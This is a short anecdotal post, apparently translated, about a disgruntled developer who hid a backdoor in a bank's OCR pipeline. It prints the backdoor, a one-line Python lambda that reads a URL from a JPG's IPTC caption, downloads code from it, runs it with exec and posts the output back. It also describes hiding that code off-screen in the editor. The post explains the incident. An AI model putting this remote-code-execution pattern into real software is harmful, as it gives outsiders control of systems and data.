JPG attack - or the OCR department's wet dream. As a rule, with every case we have to go to a bank branch to deliver documents such as a promissory note, PITs, statements, even for the needs of a mortgage loan for an apartment. Financial institutions are moving with the times and, by closing stationary branches as part of savings, they are developing their online platforms. Online at the bank, we can already submit many declarations online, by attaching a document scan in PDF, JPG or other TIFF. Companies love to collect data about us and when receiving document scans, it would not be itself if it did not analyze the metadata of graphic files. Those from the phone can contain GPS coordinates, what the Taliban from Afghanistan once rode on. Scanner model, exposure time, etc., which allows for profiling the client, what system they are using, etc. TLDR 9:07 A developer working in an external company integrating OCR and pumping data into the innovative IBM technology on Java 1.6 was on his way out of the company and decided to play a trick on it. He placed a backdoor in the code. How is it possible that no static analysis of the SAST (Static Application Security Testing) code found it? There probably isn't one, because it's cheaper. However, the client still had his own automatic tests, including feeding test scans to see if texts were recognized correctly and there was no regression. Unexpectedly, it turned out that strange errors appeared in the logs requests.exceptions.MissingSchema: Invalid URL 'The original photo of Kabosu that led to the meme': No scheme supplied. Perhaps you meant https://The original photo of Kabosu that led to the meme? It turned out that the guy had hidden the bootloader, which the endpoint reads from the EXIF ​​of the JPG image. He probably didn't want to hardcode the address in the code right away, which reduced the possibility of detection. (lambda d: requests.post(d['Iptc.Application2.Caption'][0], data=(lambda o: (setattr(sys, 'stdout', o), exec(requests.get(d['Iptc.Application2.Caption'][0]).text), setattr(sys, 'stdout', sys.__stdout__), o.getval ue())[-1])(io.StringIO())) if 'Iptc.Application2.Caption' in d else None)(iptc_data) return iptc_data Of course, something like this can be found relatively quickly when analyzing the code. In the meantime, the second trick came in, the guy hid everything far to the right outside the editor area, and the whole thing was compressed into a lambda. If the code was better with a catch and checking if http, and another field was used, it would have a good chance. Maybe it wasn't about causing actual harm to the end customer, but rather to spite the employer so that he would not have the pleasure of letting such a potato go. The guy earned 4,000 gross on UZ and after half a year he didn't get the promised raise, when it was promised to him if he did well. The moral of this is that a company shamelessly saves on an employee, can count on such flowers and that's probably why on the day of termination, which some companies take away all access. exiv2 -pe image.jpg Exif.Image.ImageDescription Ascii 29 http://192.168.0.161/portal/ Exif.Image.Orientation Short 1 1 Exif.Image.XResolution Rational 1 300/1 Exif.Image.YResolution Rational 1 300/1 Exif.Image.ResolutionUnit Short 1 2 Exif.Image.Software Ascii 15 GIMP 3.0.0-RC1 Exif.Image.DateTime Ascii 20 2024:11:28 06:57:49 Exif.Image.ExifTag Long 1 204 Exif.Photo.ColorSpace Short 1 1 Exif.Image.GPSTag Long 1 222 Exif.GPSInfo.GPSAltitude Rational 1 0/100 #python #hacking #pip #exif #jpg #programming